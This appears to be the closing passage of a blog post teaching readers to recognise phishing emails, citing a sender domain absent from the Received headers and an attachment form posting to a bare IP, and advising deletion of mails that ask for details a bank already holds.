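A From: domain that never appears in the Received chain, plus an attachment whose form posts to a bare IP, is the same picture the screenshots above show.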

PS: As of this writing the above server is still up and running although the post action is no longer working.

Hope this blog helped you learn how to easily spot phishing mails and protect your hard-earned money. Bottom line: if you get a mail asking for stuff your financial institution should already know, it's fake; delete it.